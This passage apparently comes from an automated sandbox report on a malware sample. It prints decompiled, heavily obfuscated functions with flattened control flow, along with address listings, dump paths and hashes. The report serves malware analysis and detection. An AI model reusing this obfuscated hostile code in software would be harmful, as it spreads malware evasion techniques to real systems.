				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x2f3dfc; // 0x0
							_t302 = E002E5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x2f3dfc; // 0x0
								_t306 = E002E5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E002D7FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E002E8519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}




















































                                                                                                                                  0x002d70bc
                                                                                                                                  0x002d70c3
                                                                                                                                  0x002d70c6
                                                                                                                                  0x002d70cd
                                                                                                                                  0x002d70d4
                                                                                                                                  0x002d70d5
                                                                                                                                  0x002d70d6
                                                                                                                                  0x002d70d7
                                                                                                                                  0x002d70dc
                                                                                                                                  0x002d70e7
                                                                                                                                  0x002d70e9
                                                                                                                                  0x002d70f0
                                                                                                                                  0x002d70f3
                                                                                                                                  0x002d70fd
                                                                                                                                  0x002d7102
                                                                                                                                  0x002d7107
                                                                                                                                  0x002d710f
                                                                                                                                  0x002d7117
                                                                                                                                  0x002d711f
                                                                                                                                  0x002d7127
                                                                                                                                  0x002d7132
                                                                                                                                  0x002d7137
                                                                                                                                  0x002d713d
                                                                                                                                  0x002d7145
                                                                                                                                  0x002d714d
                                                                                                                                  0x002d7159
                                                                                                                                  0x002d715e
                                                                                                                                  0x002d7164
                                                                                                                                  0x002d7169
                                                                                                                                  0x002d716e
                                                                                                                                  0x002d7176
                                                                                                                                  0x002d7183
                                                                                                                                  0x002d7186
                                                                                                                                  0x002d718a
                                                                                                                                  0x002d7198
                                                                                                                                  0x002d719c
                                                                                                                                  0x002d71a4
                                                                                                                                  0x002d71ac
                                                                                                                                  0x002d71b4
                                                                                                                                  0x002d71bc
                                                                                                                                  0x002d71c1
                                                                                                                                  0x002d71c9
                                                                                                                                  0x002d71d1
                                                                                                                                  0x002d71db
                                                                                                                                  0x002d71df
                                                                                                                                  0x002d71e4
                                                                                                                                  0x002d71ec
                                                                                                                                  0x002d71f4
                                                                                                                                  0x002d71fc
                                                                                                                                  0x002d7201
                                                                                                                                  0x002d7206
                                                                                                                                  0x002d720e
                                                                                                                                  0x002d7216
                                                                                                                                  0x002d721e
                                                                                                                                  0x002d7226
                                                                                                                                  0x002d722e
                                                                                                                                  0x002d7233
                                                                                                                                  0x002d7238
                                                                                                                                  0x002d7240
                                                                                                                                  0x002d7248
                                                                                                                                  0x002d7256
                                                                                                                                  0x002d725b
                                                                                                                                  0x002d7261
                                                                                                                                  0x002d7266
                                                                                                                                  0x002d726e
                                                                                                                                  0x002d727b
                                                                                                                                  0x002d727e
                                                                                                                                  0x002d7282
                                                                                                                                  0x002d728a
                                                                                                                                  0x002d7297
                                                                                                                                  0x002d729b
                                                                                                                                  0x002d72a3
                                                                                                                                  0x002d72ab
                                                                                                                                  0x002d72b3
                                                                                                                                  0x002d72b8
                                                                                                                                  0x002d72c0
                                                                                                                                  0x002d72c8
                                                                                                                                  0x002d72cd
                                                                                                                                  0x002d72d2
                                                                                                                                  0x002d72da
                                                                                                                                  0x002d72e2
                                                                                                                                  0x002d72ea
                                                                                                                                  0x002d72f2
                                                                                                                                  0x002d72ff
                                                                                                                                  0x002d7303
                                                                                                                                  0x002d730b
                                                                                                                                  0x002d731b
                                                                                                                                  0x002d731f
                                                                                                                                  0x002d7327
                                                                                                                                  0x002d732f
                                                                                                                                  0x002d7337
                                                                                                                                  0x002d733f
                                                                                                                                  0x002d7344
                                                                                                                                  0x002d734c
                                                                                                                                  0x002d7354
                                                                                                                                  0x002d7359
                                                                                                                                  0x002d735a
                                                                                                                                  0x002d735e
                                                                                                                                  0x002d7363
                                                                                                                                  0x002d736b
                                                                                                                                  0x002d7373
                                                                                                                                  0x002d737b
                                                                                                                                  0x002d7385
                                                                                                                                  0x002d7389
                                                                                                                                  0x002d738d
                                                                                                                                  0x002d7395
                                                                                                                                  0x002d739d
                                                                                                                                  0x002d73a2
                                                                                                                                  0x002d73aa
                                                                                                                                  0x002d73b2
                                                                                                                                  0x002d73b7
                                                                                                                                  0x002d73bf
                                                                                                                                  0x002d73c7
                                                                                                                                  0x002d73cf
                                                                                                                                  0x002d73d4
                                                                                                                                  0x002d73dc
                                                                                                                                  0x002d73ea
                                                                                                                                  0x002d73ee
                                                                                                                                  0x002d73f6
                                                                                                                                  0x002d73fe
                                                                                                                                  0x002d7403
                                                                                                                                  0x002d740b
                                                                                                                                  0x002d7413
                                                                                                                                  0x002d741b
                                                                                                                                  0x002d7420
                                                                                                                                  0x002d7428
                                                                                                                                  0x002d7430
                                                                                                                                  0x002d743d
                                                                                                                                  0x002d7443
                                                                                                                                  0x002d7448
                                                                                                                                  0x002d744d
                                                                                                                                  0x002d7455
                                                                                                                                  0x002d7463
                                                                                                                                  0x002d746b
                                                                                                                                  0x002d746f
                                                                                                                                  0x002d7477
                                                                                                                                  0x002d7477
                                                                                                                                  0x002d7485
                                                                                                                                  0x002d7592
                                                                                                                                  0x002d75a6
                                                                                                                                  0x002d75ab
                                                                                                                                  0x002d75b2
                                                                                                                                  0x002d75b4
                                                                                                                                  0x00000000
                                                                                                                                  0x002d75b4
                                                                                                                                  0x002d748b
                                                                                                                                  0x002d7491
                                                                                                                                  0x002d7531
                                                                                                                                  0x002d7542
                                                                                                                                  0x002d7547
                                                                                                                                  0x002d754e
                                                                                                                                  0x002d75d7
                                                                                                                                  0x002d75d9
                                                                                                                                  0x002d75e1
                                                                                                                                  0x002d7550
                                                                                                                                  0x002d7550
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7550
                                                                                                                                  0x002d7493
                                                                                                                                  0x002d7499
                                                                                                                                  0x002d74d4
                                                                                                                                  0x002d74d5
                                                                                                                                  0x002d74d6
                                                                                                                                  0x002d74db
                                                                                                                                  0x002d74e6
                                                                                                                                  0x002d74ec
                                                                                                                                  0x00000000
                                                                                                                                  0x002d74ec
                                                                                                                                  0x002d749b
                                                                                                                                  0x002d74a1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d74a7
                                                                                                                                  0x002d74b6
                                                                                                                                  0x002d74bb
                                                                                                                                  0x002d74a1
                                                                                                                                  0x002d7499
                                                                                                                                  0x002d7491
                                                                                                                                  0x002d75e4
                                                                                                                                  0x002d75f0
                                                                                                                                  0x002d75f0
                                                                                                                                  0x002d75be
                                                                                                                                  0x002d75c0
                                                                                                                                  0x002d75c0
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                                  • API String ID: 0-2314355462
                                                                                                                                  • Opcode ID: 1a6dd5def31c5143090e8177b8588eb1afe574ec22c18b820ca35c760e827a1a
                                                                                                                                  • Instruction ID: 93727eca063664d499c7ca2c63b97f67197d570e0cce193dd59277a263e5093a
                                                                                                                                  • Opcode Fuzzy Hash: 1a6dd5def31c5143090e8177b8588eb1afe574ec22c18b820ca35c760e827a1a
                                                                                                                                  • Instruction Fuzzy Hash: 9CD11D711183819FC764CF65C88991BBBF1BBC4748F50891EF6A68A220D3B6C959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EC631 Relevance: 10.2, Strings: 8, Instructions: 218COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002EC631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E002D474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E002D474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E002D474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E002EC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E002D474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E002D474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E002EC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}








































                                                                                                                                  0x002ec631
                                                                                                                                  0x002ec638
                                                                                                                                  0x002ec63a
                                                                                                                                  0x002ec644
                                                                                                                                  0x002ec649
                                                                                                                                  0x002ec64e
                                                                                                                                  0x002ec656
                                                                                                                                  0x002ec65e
                                                                                                                                  0x002ec666
                                                                                                                                  0x002ec66e
                                                                                                                                  0x002ec676
                                                                                                                                  0x002ec67e
                                                                                                                                  0x002ec682
                                                                                                                                  0x002ec68a
                                                                                                                                  0x002ec692
                                                                                                                                  0x002ec697
                                                                                                                                  0x002ec69f
                                                                                                                                  0x002ec6a7
                                                                                                                                  0x002ec6af
                                                                                                                                  0x002ec6b7
                                                                                                                                  0x002ec6bf
                                                                                                                                  0x002ec6c7
                                                                                                                                  0x002ec6cf
                                                                                                                                  0x002ec6d7
                                                                                                                                  0x002ec6e2
                                                                                                                                  0x002ec6e4
                                                                                                                                  0x002ec6e9
                                                                                                                                  0x002ec6ef
                                                                                                                                  0x002ec6f7
                                                                                                                                  0x002ec6fc
                                                                                                                                  0x002ec704
                                                                                                                                  0x002ec70c
                                                                                                                                  0x002ec714
                                                                                                                                  0x002ec719
                                                                                                                                  0x002ec721
                                                                                                                                  0x002ec729
                                                                                                                                  0x002ec731
                                                                                                                                  0x002ec736
                                                                                                                                  0x002ec73e
                                                                                                                                  0x002ec746
                                                                                                                                  0x002ec74b
                                                                                                                                  0x002ec750
                                                                                                                                  0x002ec758
                                                                                                                                  0x002ec760
                                                                                                                                  0x002ec76c
                                                                                                                                  0x002ec771
                                                                                                                                  0x002ec777
                                                                                                                                  0x002ec77f
                                                                                                                                  0x002ec787
                                                                                                                                  0x002ec793
                                                                                                                                  0x002ec796
                                                                                                                                  0x002ec79a
                                                                                                                                  0x002ec7a2
                                                                                                                                  0x002ec7aa
                                                                                                                                  0x002ec7b7
                                                                                                                                  0x002ec7bb
                                                                                                                                  0x002ec7c3
                                                                                                                                  0x002ec7d0
                                                                                                                                  0x002ec7d4
                                                                                                                                  0x002ec7d9
                                                                                                                                  0x002ec7e1
                                                                                                                                  0x002ec7e9
                                                                                                                                  0x002ec7f1
                                                                                                                                  0x002ec7f9
                                                                                                                                  0x002ec801
                                                                                                                                  0x002ec813
                                                                                                                                  0x002ec817
                                                                                                                                  0x002ec81f
                                                                                                                                  0x002ec827
                                                                                                                                  0x002ec834
                                                                                                                                  0x002ec838
                                                                                                                                  0x002ec840
                                                                                                                                  0x002ec848
                                                                                                                                  0x002ec850
                                                                                                                                  0x002ec858
                                                                                                                                  0x002ec860
                                                                                                                                  0x002ec868
                                                                                                                                  0x002ec870
                                                                                                                                  0x002ec878
                                                                                                                                  0x002ec880
                                                                                                                                  0x002ec888
                                                                                                                                  0x002ec890
                                                                                                                                  0x002ec898
                                                                                                                                  0x002ec8a5
                                                                                                                                  0x002ec8ae
                                                                                                                                  0x002ec8b2
                                                                                                                                  0x002ec8ba
                                                                                                                                  0x002ec8c2
                                                                                                                                  0x002ec8ca
                                                                                                                                  0x002ec8cf
                                                                                                                                  0x002ec8d7
                                                                                                                                  0x002ec8df
                                                                                                                                  0x002ec8e4
                                                                                                                                  0x002ec8e9
                                                                                                                                  0x002ec8f1
                                                                                                                                  0x002ec8f9
                                                                                                                                  0x002ec901
                                                                                                                                  0x002ec909
                                                                                                                                  0x002ec911
                                                                                                                                  0x002ec911
                                                                                                                                  0x002ec919
                                                                                                                                  0x002ec919
                                                                                                                                  0x002ec919
                                                                                                                                  0x002ec919
                                                                                                                                  0x002ec91b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec921
                                                                                                                                  0x002ec9e2
                                                                                                                                  0x002ec9e3
                                                                                                                                  0x002ec9e4
                                                                                                                                  0x002ec9e9
                                                                                                                                  0x002ec9ec
                                                                                                                                  0x002ec9f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec927
                                                                                                                                  0x002ec92d
                                                                                                                                  0x002ec9c0
                                                                                                                                  0x002ec9c1
                                                                                                                                  0x002ec9c2
                                                                                                                                  0x002ec9c7
                                                                                                                                  0x002ec9ca
                                                                                                                                  0x002ec9cf
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec933
                                                                                                                                  0x002ec939
                                                                                                                                  0x002ec99e
                                                                                                                                  0x002ec99f
                                                                                                                                  0x002ec9a0
                                                                                                                                  0x002ec9a5
                                                                                                                                  0x002ec9a8
                                                                                                                                  0x002ec9ad
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec93b
                                                                                                                                  0x002ec941
                                                                                                                                  0x002ec97d
                                                                                                                                  0x002ec981
                                                                                                                                  0x002ec986
                                                                                                                                  0x002ec989
                                                                                                                                  0x002ec98e
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec943
                                                                                                                                  0x002ec949
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec94f
                                                                                                                                  0x002ec95b
                                                                                                                                  0x002ec95c
                                                                                                                                  0x002ec95d
                                                                                                                                  0x002ec962
                                                                                                                                  0x002ec965
                                                                                                                                  0x002ec96a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec96a
                                                                                                                                  0x002ec949
                                                                                                                                  0x002ec941
                                                                                                                                  0x002ec939
                                                                                                                                  0x002ec92d
                                                                                                                                  0x002eca5f
                                                                                                                                  0x002eca68
                                                                                                                                  0x002eca68
                                                                                                                                  0x002ec9fe
                                                                                                                                  0x002eca26
                                                                                                                                  0x002eca27
                                                                                                                                  0x002eca28
                                                                                                                                  0x002eca2d
                                                                                                                                  0x002eca30
                                                                                                                                  0x002eca32
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca00
                                                                                                                                  0x002eca06
                                                                                                                                  0x002eca5d
                                                                                                                                  0x002eca08
                                                                                                                                  0x002eca0e
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca10
                                                                                                                                  0x002eca10
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca10
                                                                                                                                  0x002eca0e
                                                                                                                                  0x002eca06
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca34
                                                                                                                                  0x002eca34
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                                  • API String ID: 0-1553751006
                                                                                                                                  • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                  • Instruction ID: 19aa28f7df91c69421bcf03447f5a1db4b7434da053bf93696a909596f737c20
                                                                                                                                  • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                  • Instruction Fuzzy Hash: 28A131B28183819FC358CF66D48A41FFBE1BB85748F904A1DF595A6220D3B5DA19CF83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EF435 Relevance: 9.3, Strings: 7, Instructions: 536COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002EF435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
